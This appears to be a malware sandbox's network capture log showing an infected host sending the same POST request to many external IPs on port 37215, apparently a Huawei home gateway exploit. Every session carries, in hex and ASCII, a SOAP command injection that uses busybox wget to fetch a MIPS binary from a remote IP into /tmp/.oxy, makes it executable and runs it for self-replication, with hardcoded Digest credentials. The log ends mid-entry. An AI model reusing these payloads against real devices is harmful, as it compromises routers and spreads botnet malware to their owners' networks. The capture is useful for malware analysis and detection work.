                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2314192.168.2.1344078197.141.34.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783708096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2315192.168.2.1337088157.163.134.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783729076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2316192.168.2.1336508197.159.155.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783762932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2317192.168.2.1337098157.198.249.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783777952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2318192.168.2.134679841.70.198.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783879042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2319192.168.2.133535041.210.82.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.783943892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2320192.168.2.1342740157.93.237.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784006119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2321192.168.2.1354220157.201.105.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784058094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2322192.168.2.1353294197.254.182.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784081936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2323192.168.2.133563295.163.209.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784125090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 